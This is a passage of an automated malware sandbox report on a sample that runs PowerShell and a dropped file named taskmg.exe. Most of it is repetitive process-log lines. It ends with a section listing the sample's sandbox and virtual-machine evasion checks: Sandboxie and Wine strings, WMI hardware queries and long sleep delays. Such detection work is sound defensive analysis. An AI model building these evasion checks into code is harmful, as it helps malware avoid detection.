                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\verclsid.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion:

                    barindex
                    Yara detected AntiVM3Show sources
                    Source: Yara matchFile source: 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: taskmg.exe PID: 1156, type: MEMORYSTR
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                    Source: taskmg.exe, 00000009.00000002.446169718.000000000283F000.00000004.00000001.sdmp, taskmg.exe, 00000009.00000002.446030181.00000000027A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                    Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2608Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2128Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1832Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 344Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2256Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2860Thread sleep time: -30027s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1684Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 572Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2940Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 1308Thread sleep time: -360000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exe TID: 2024Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 645Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWindow / User API: threadDelayed 9120Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\taskmg.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
